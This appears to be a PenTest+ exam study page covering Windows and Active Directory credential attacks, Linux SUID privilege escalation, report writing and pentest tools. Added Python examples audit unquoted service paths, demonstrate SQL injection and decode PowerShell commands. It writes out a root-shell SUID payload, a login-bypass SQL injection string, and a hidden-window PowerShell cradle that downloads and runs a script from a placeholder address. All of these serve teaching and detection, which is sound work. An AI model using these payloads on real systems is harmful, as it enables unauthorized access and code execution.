- Mimikatz sekurlsa::logonpasswords: Extracts plaintext passwords, NTLM hashes, and Kerberos tickets from LSASS memory. Requires SYSTEM or debug privilege. Mitigated by disabling WDigest caching and enabling Credential Guard
- Token Impersonation: Stealing security tokens from privileged processes using tools like Incognito (Metasploit module). Allows impersonating domain admins if their tokens are in memory
- Unquoted Service Paths: Windows services with unquoted paths containing spaces. Windows resolves `C:\Program Files\App\service.exe` by trying `C:\Program.exe` first. Placing a malicious binary at an earlier resolution path escalates privileges
- DLL Hijacking: Applications search for DLLs in directories they can write to. Placing a malicious DLL earlier in the search order causes it to load with the application's privileges
- Pass-the-Hash: Using captured NTLM hashes with PsExec, Impacket's wmiexec, or CrackMapExec to authenticate to other systems without knowing the plaintext password. Core lateral movement technique
- DCSync Attack: Uses the MS-DRSR protocol to simulate a domain controller and request password replication from the real DC. Requires Domain Replication privileges (Domain Admins, Enterprise Admins). Extracts all domain password hashes
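The unquoted-service-path resolution rule above, turned into an audit check as an added example (not code from the course): given service `ImagePath` values, it lists the candidate executables Windows would try before the real one, which is the set of locations whose directory ACLs a defender (or a hardening script) needs to verify. The service entries are constructed, not read from a real registry; the resolution order follows the page's description of CreateProcess splitting an unquoted path at each space.

```python
import re

# Constructed ImagePath values, as they would be read from
# HKLM\SYSTEM\CurrentControlSet\Services\<name>\ImagePath (not from a real host).
SAMPLE_SERVICES = {
    "VulnSvc":   r"C:\Program Files\My App\service.exe",
    "ArgSvc":    r"C:\Program Files\App\svc.exe -k foo",
    "QuotedSvc": r'"C:\Program Files\My App\service.exe"',
    "W32Time":   r"C:\Windows\system32\svchost.exe -k LocalService",
}


def executable_part(image_path: str) -> str:
    """Drop service arguments: keep everything up to and including the first '.exe'."""
    m = re.match(r"(.*?\.exe)", image_path, re.IGNORECASE)
    return m.group(1) if m else image_path


def hijack_candidates(image_path: str) -> list:
    r"""Executables Windows would try before the intended binary.

    For an unquoted path the loader splits at each space and appends .exe, so
    'C:\Program Files\My App\service.exe' is tried as 'C:\Program.exe', then
    'C:\Program Files\My.exe', then the real file. Quoted paths are exempt, and
    a path with no spaces has no earlier candidates.
    """
    path = image_path.strip()
    if path.startswith('"'):
        return []
    exe = executable_part(path)
    return [exe[:i] + ".exe" for i, ch in enumerate(exe) if ch == " "]


def audit_services(services: dict) -> dict:
    """{service name: [candidate paths]} for every service with an exploitable-looking ImagePath."""
    findings = {}
    for name, image_path in services.items():
        candidates = hijack_candidates(image_path)
        if candidates:
            findings[name] = candidates
    return findings


if __name__ == "__main__":
    for name, candidates in audit_services(SAMPLE_SERVICES).items():
        print(f"{name}: check write access to the parent directory of each of {candidates}")
```

The candidate list is only half the finding: `C:\` and `C:\Program Files\` are not writable by standard users on a default install, so the reportable cases are third-party services installed under directories with loose ACLs. The remediation is the one-liner the report should carry: wrap the ImagePath in quotes.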
📋 Scenario — privilege escalation via misconfigured SUID binary (authorized lab)
Situation (authorized internal test): You have a low-privilege shell on a Linux host (192.168.1.50). Goal: escalate to root using local privilege escalation techniques.
Walk:
1) Enumerate SUID binaries: `find / -perm -u=s -type f 2>/dev/null` → output includes /usr/bin/find (unusual — find doesn't need SUID).
2) GTFOBins check: Search GTFOBins for "find SUID" → payload: `find . -exec /bin/sh -p \; -quit`.
3) Run the payload → `whoami` returns root.
4) Document: Screenshot the `id` command output showing uid=0(root) as proof. Note the misconfiguration: SUID set on find, which allows arbitrary command execution.
5) Remediation note in report: "Remove SUID bit from /usr/bin/find: `chmod u-s /usr/bin/find`".
Exam pattern: PT0-002 tests common Linux privesc vectors: SUID binaries, sudo misconfig (sudo -l), writable cron jobs, PATH hijacking. GTFOBins is the authoritative reference for living-off-the-land escalation.
- Linux privesc reflex: `sudo -l` for misconfigs, `find / -perm -4000 -type f 2>/dev/null` for SUID binaries, check `/etc/cron.d/` + writable PATH entries, `linpeas.sh` for automation.
- Kerberoasting: request a TGS for any user with an SPN, the ticket is encrypted with the user's NTLM hash — crack offline. Service accounts with weak passwords are the gold mine.
- BloodHound + SharpHound map AD attack paths visually: ingest with `SharpHound.exe -c All`, then "shortest path from Owned to Domain Admin" tells you exactly which lateral hop to take next.
06
Reporting, Communication & Ethics
2 lessons · ~4h
Key Concepts
- Executive Summary: Written for non-technical stakeholders. Covers: overall security posture, business risk of findings, prioritized remediation recommendations. No CVE numbers or command output
- Methodology: Describes the testing approach, tools used, and standards followed (PTES, OWASP, NIST). Provides context for the technical team
- Technical Findings: Each finding includes: title, severity rating (Critical/High/Medium/Low/Informational), CVSS score, affected asset, description, reproduction steps, evidence (screenshots/output), and remediation recommendation
- CVSS Scoring: Base score uses AV, AC, PR, UI, S, C, I, A metrics. Critical 9.0–10.0 requires network-accessible, no-auth, no-interaction, full CIA impact. Know the score ranges for all severity levels
- Risk Ratings: Risk = Likelihood × Impact. A theoretically critical vulnerability behind multiple compensating controls may be rated lower actual risk. Report both the raw CVSS and the contextual risk
- Attack Narrative: Tells the story of the engagement — initial access path, privilege escalation chain, and final impact. Demonstrates real-world business risk to stakeholders who do not read technical details
Key Concepts
- Cleanup: Remove all backdoors, created accounts, uploaded files, C2 agents, and configuration changes. Document every artifact created and confirm removal. Failure to clean up can result in real attackers leveraging your tools
- Remediation Verification (Retesting): After the client patches, retest specific vulnerabilities to confirm fixes are effective. This is a targeted, scoped activity — not a full re-engagement
- Data Handling: Securely delete all client data after report delivery per the data handling agreement. Reports containing sensitive data must be encrypted at rest and in transit
- Responsible Disclosure: For zero-days found in third-party vendor software, follow coordinated disclosure: notify the vendor, allow a reasonable remediation window (typically 90 days), then disclose publicly
- Non-Disclosure: Findings are confidential. Sharing client vulnerabilities with third parties (without authorization) violates the NDA and may constitute criminal computer fraud
- Debrief: Walk the client's technical team through findings, reproduction steps, and remediation priorities. Provides context that a written report alone cannot convey
📋 Scenario — structuring a pentest finding write-up
Situation: You found SQL injection in the client's login form that allows unauthenticated access to the full user database (50,000 records including hashed passwords). Write the finding.
Finding structure (per PT0-002 report standard):
- Title: SQL Injection — Authentication Bypass and Full Database Exposure
- Severity: Critical (CVSS 3.1 Base Score: 9.8)
- Affected Component: POST /login (parameter: username)
- Description: The login form is vulnerable to SQL injection. An unauthenticated attacker can bypass authentication by submitting `' OR '1'='1` as the username, and can extract all records from the app_db database using automated tools.
- Evidence: Screenshot of successful bypass; sqlmap output showing 50,000 rows extracted.
- Risk/Business Impact: Full compromise of customer PII; regulatory exposure under GDPR; potential for credential-stuffing attacks.
- Remediation: Use parameterised queries / prepared statements; implement WAF rules blocking common SQLi payloads; enforce input validation.
Exam pattern: PT0-002 tests that testers report findings with severity (Critical/High/Medium/Low/Informational), business impact, and actionable remediation — not just "we found a bug".
- Findings need CVSS scoring + business-impact framing: "Critical RCE on payment server" lands harder than "Apache Struts CVE-2017-5638". Sort by risk, not by domain.
- Every finding has a remediation the client can execute — vague ("patch all systems") fails. Include exact commands, configs, or upgrade paths plus a re-test plan.
- Ethics gates: destroy or return all customer data per the SOW, never sell or disclose findings, report illegal-activity discoveries (CP, fraud) per contract clauses, NDA stays valid past engagement end.
07
Penetration Testing Tools & Code Analysis
3 lessons · ~6h
nmap, Burp Suite, Metasploit, hashcat, john, hydra, responder, impacket (PsExec, secretsdump, GetUserSPNs), mimikatz, BloodHound. Plus enough Python / Bash / PowerShell to script the gaps and read the public PoC exploits you're pasting from GitHub.
Key Tools by Category
- Reconnaissance: theHarvester (OSINT), Maltego (link analysis), Shodan (device search), SpiderFoot (automated OSINT), Recon-ng (framework)
- Scanning: Nmap (port/service/OS), Nessus (vulnerability scanner), OpenVAS, Nikto (web server), Gobuster / dirb / ffuf (directory brute-force)
- Exploitation: Metasploit Framework (general), sqlmap (SQL injection), Hydra / Medusa (password attacks), BeEF (browser exploitation)
- Web Application: Burp Suite (proxy/scanner/intruder), OWASP ZAP (open-source alternative), sqlmap, WPScan (WordPress), Nikto
- Post-Exploitation: Mimikatz (Windows credential extraction), BloodHound (AD attack path mapping), Impacket (Python AD tools), CrackMapExec
- Wireless: Aircrack-ng suite (airodump-ng, aireplay-ng, aircrack-ng), Wireshark, hcxdumptool (PMKID capture), Kismet
- Traffic Analysis: Wireshark (packet capture/analysis), tcpdump (CLI capture), Netcat (nc — port scanning, banners, file transfer, reverse shells)
Key Concepts
- Proxy Module: Intercepts and modifies HTTP/HTTPS traffic between the browser and server. Requires installing Burp's CA certificate in the browser to intercept HTTPS. Core tool for web application testing
- Intruder: Automated attack tool for brute-forcing parameters, credential stuffing, fuzzing inputs, and testing all values in a list. Four attack modes: Sniper, Battering Ram, Pitchfork, Cluster Bomb
- Repeater: Manually resend and modify individual HTTP requests and view responses. Used to test specific injection points, verify vulnerabilities, and craft exploits
- Scanner (Pro): Automated vulnerability scanner that tests for SQLi, XSS, SSRF, XXE, path traversal, and hundreds of other issues. Pro feature — not available in Community edition
- SSL Pinning Bypass: When apps implement certificate pinning, Burp's CA is rejected. Bypass using Frida to hook the pinning validation function at runtime or use apktool to patch the APK
- Extensions: BApp Store provides community extensions. Notable: Autorize (authorization testing), Param Miner (hidden parameters), J2EEScan, SQLipy
Key Concepts
- Python for Pentesting: Socket module for TCP connect scanners; requests module for HTTP testing; subprocess for running OS commands; struct for binary data manipulation. Understanding simple scripts is tested on PenTest+
- Bash Scripting: Ping sweeps using loops and ICMP, parsing Nmap output, automating directory enumeration, and one-liner reverse shells. Know shell metacharacters for command injection context
- PowerShell Obfuscation: -EncodedCommand (Base64 of the UTF-16LE-encoded command, not UTF-8), -NoProfile -NonInteractive -WindowStyle Hidden (OPSEC flags), Invoke-Expression (IEX) download cradles. Core technique for Windows-based attacks and evasion
- Code Review for Vulnerabilities: Identifying injection sinks (SQL queries, shell commands, template rendering, deserialization), missing input validation, hardcoded credentials, insecure random number generation, and trust boundary violations
- Identifying Vulnerability Type from Code: Seeing query = "SELECT * FROM users WHERE name='" + user_input + "'" → SQLi. Seeing os.system("ping " + user_input) → command injection. Seeing exec(user_input) → RCE (code injection)
📋 Scenario — identifying a vulnerability from a code snippet
Situation: The exam presents this Python snippet from a web app and asks you to identify the vulnerability and its CWE:
username = request.args.get('user')
query = "SELECT * FROM users WHERE username = '" + username + "'"
cursor.execute(query)
Analysis: String concatenation to build a SQL query from unsanitised user input = SQL Injection (CWE-89). An attacker controls the user parameter and can inject SQL operators. Fix: Use a parameterised query: cursor.execute("SELECT * FROM users WHERE username = %s", (username,)). Here %s is the DB-API placeholder of the MySQL/PostgreSQL drivers, not Python string formatting: the driver binds the value as data (or escapes it itself), so it is never parsed as part of the SQL statement.
Other code-review patterns the exam tests: Hardcoded credentials (password = "admin123" in source — CWE-798). Missing input validation on file paths (path traversal — CWE-22). eval(user_input) — code injection (CWE-94). subprocess.call(user_input, shell=True) — OS command injection (CWE-78).
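The vulnerable and fixed lookups from the scenario side by side, run against an in-memory SQLite database so you can watch the payload from the sample finding match every row. This is an added example, not code from the course page; the users table, its rows and the payload are constructed here. SQLite's DB-API placeholder is ? rather than the %s used by the MySQL and PostgreSQL drivers in the scenario.

```python
"""CWE-89 demo: concatenated query vs. bound parameter (added example)."""
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed sample data: two users in an in-memory database."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.executemany(
        "INSERT INTO users VALUES (?, ?)",
        [("alice", "hunter2"), ("bob", "s3cret")],
    )
    return conn


def lookup_vulnerable(conn: sqlite3.Connection, username: str) -> list[str]:
    """The pattern from the scenario: attacker text becomes SQL grammar."""
    query = "SELECT username FROM users WHERE username = '" + username + "'"
    return [row[0] for row in conn.execute(query)]


def lookup_safe(conn: sqlite3.Connection, username: str) -> list[str]:
    """Bound parameter: the driver passes the value as data, never as SQL text."""
    rows = conn.execute(
        "SELECT username FROM users WHERE username = ?", (username,)
    )
    return [row[0] for row in rows]


PAYLOAD = "' OR '1'='1"  # auth-bypass payload quoted in the sample finding


if __name__ == "__main__":
    conn = make_db()
    # Vulnerable: WHERE username = '' OR '1'='1' is true for every row
    print("vulnerable:", sorted(lookup_vulnerable(conn, PAYLOAD)))
    # Safe: looks for a user literally named ' OR '1'='1 and finds nothing
    print("safe:      ", lookup_safe(conn, PAYLOAD))
    print("safe, real:", lookup_safe(conn, "alice"))
```

The takeaway for the code-review question: the fix is not quoting or escaping by hand but keeping user data out of the statement text entirely. A comment-terminator variant such as alice'-- behaves the same way: it matches in lookup_vulnerable and finds no such user in lookup_safe.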
- Burp Suite anatomy: Proxy (intercept), Repeater (manual replay/tweak), Intruder (fuzzing), Scanner (Pro-only auto-vuln). The exam asks you to pick the right tab for a stated task.
- Cracking decision tree: hashcat for GPU-accelerated cracking with -m <mode>, john for CPU + format auto-detect, hydra for online (live login) brute-force. Online ≠ offline — different defenses (lockout and rate limiting vs. hash strength and salting), different speeds.
- Always read the exploit code before running it. PoC GitHub repos sometimes include backdoors (reverse shells in __init__, malicious URLs in the payload). Sandbox + diff against known-good before pointing it at a client.
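A decoder for the -EncodedCommand blobs and OPSEC flags from the PowerShell Obfuscation item in the Key Concepts above, written in Python as an added example (not from the course page) so it doubles as a triage helper for command lines pulled from EDR or Sysmon events. The sample command line and its URL are constructed; the switch matching assumes powershell.exe's abbreviated-switch behaviour (-e, -ec, -enc, -nop, -noni, -w), which is how these flags usually appear in the wild.

```python
"""Build, decode and triage PowerShell -EncodedCommand invocations (added example)."""
import base64
import re


def encode_command(script: str) -> str:
    """powershell.exe expects the script as UTF-16LE before base64, not UTF-8."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_command(blob: str) -> str:
    return base64.b64decode(blob).decode("utf-16-le")


# OPSEC switches and the shortest abbreviation we accept for each (assumption:
# mirrors the unambiguous-prefix matching of powershell.exe).
OPSEC = {"noprofile": "nop", "noninteractive": "noni", "windowstyle": "w"}

# Download-cradle indicators worth flagging in the decoded script.
CRADLE = re.compile(
    r"(?i)\b(iex|invoke-expression|downloadstring|net\.webclient|invoke-webrequest|iwr)\b"
)


def triage(cmdline: str) -> dict:
    """Return the decoded script, OPSEC flags seen and cradle indicators found."""
    toks = cmdline.split()
    out = {"flags": [], "decoded": None, "indicators": []}
    for i, tok in enumerate(toks):
        if tok[:1] not in "-/":
            continue
        t = tok[1:].lower()
        # -EncodedCommand: any prefix starting with 'e', plus the special '-ec'
        if t == "ec" or (t.startswith("e") and "encodedcommand".startswith(t)):
            if i + 1 < len(toks):
                try:
                    out["decoded"] = decode_command(toks[i + 1])
                except (ValueError, UnicodeDecodeError):  # not a valid blob
                    out["decoded"] = None
        for full, shortest in OPSEC.items():
            if t.startswith(shortest) and full.startswith(t):
                out["flags"].append(full)
    out["indicators"] = sorted({m.lower() for m in CRADLE.findall(out["decoded"] or "")})
    return out


if __name__ == "__main__":
    # Constructed sample: a classic hidden-window IEX cradle (URL is TEST-NET-2)
    script = "IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/a.ps1')"
    sample = "powershell.exe -NoP -NonI -W Hidden -Enc " + encode_command(script)
    print(sample)
    print(triage(sample))
```

Two details matter when you read such scripts on the exam or in a log: the base64 alphabet in the blob tells you nothing until you decode it as UTF-16LE, and the presence of all three OPSEC switches plus a cradle in one command line is the combination detection rules key on.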
4-Week PenTest+ Study Plan
Week 1
- Day 1–2: Planning, scoping, legal documents, engagement types (Module 1)
- Day 3–4: Passive recon — OSINT, theHarvester, Shodan, certificate transparency, Google dorks
- Day 5–6: Active scanning — Nmap flags, Nikto, enum4linux, vulnerability scanners
- Day 7: Quiz session — Planning & Recon domains (pentest-001 to pentest-021)
Week 2
- Day 1–2: Metasploit framework — modules, payloads, Meterpreter, sessions
- Day 3–4: Web attacks — SQLi, XSS, CSRF, path traversal, SSRF, XXE, IDOR
- Day 5–6: Network attacks — ARP poisoning, Pass-the-Hash, Kerberoasting, password spraying
- Day 7: Wireless and physical attacks — WPA2 cracking, evil twin, tailgating, badge cloning
Week 3
- Day 1–2: Linux privilege escalation — SUID, sudo, cron jobs, kernel exploits
- Day 3–4: Windows privilege escalation — Mimikatz, token impersonation, unquoted service paths
- Day 5–6: Report writing — CVSS scoring, finding structure, executive summary vs. technical findings
- Day 7: Ethics, responsible disclosure, cleanup, retesting concepts
Week 4
- Day 1–2: Tool deep-dives — Burp Suite modules, Wireshark filters, Netcat, Hydra
- Day 3–4: Code analysis — reading Python/Bash/PowerShell scripts, identifying vulnerability types
- Day 5–6: Full practice quiz runs — timed, all 60 questions, review all incorrect answers
- Day 7: Final review of CVSS scoring, tool-to-use-case mapping, and key methodology phases
Top 3 PenTest+ Exam Mistakes
- Confusing passive and active recon: Shodan and theHarvester are passive (they query third-party sources such as search engines and Shodan's own index, not the target). Nmap and Nikto are active (they send packets to the target). Know this distinction cold.
- Mixing up attack techniques: Pass-the-Hash uses NTLM hashes. Kerberoasting cracks service tickets offline. AS-REP Roasting targets accounts with no pre-auth. Golden Ticket forges TGTs with KRBTGT hash. Each has a distinct mechanism.
- Getting CVSS scoring wrong: a 9.8 Critical is network-accessible + no privileges + no user interaction + full CIA impact, with scope unchanged. Relaxing any one of those drops the score into High (required user interaction or low privileges gives 8.8, high attack complexity gives 8.1); the one thing that lifts a score back is a changed scope, which takes a low-privilege finding to 9.9. Memorize the score ranges: Critical 9.0–10.0, High 7.0–8.9, Medium 4.0–6.9, Low 0.1–3.9.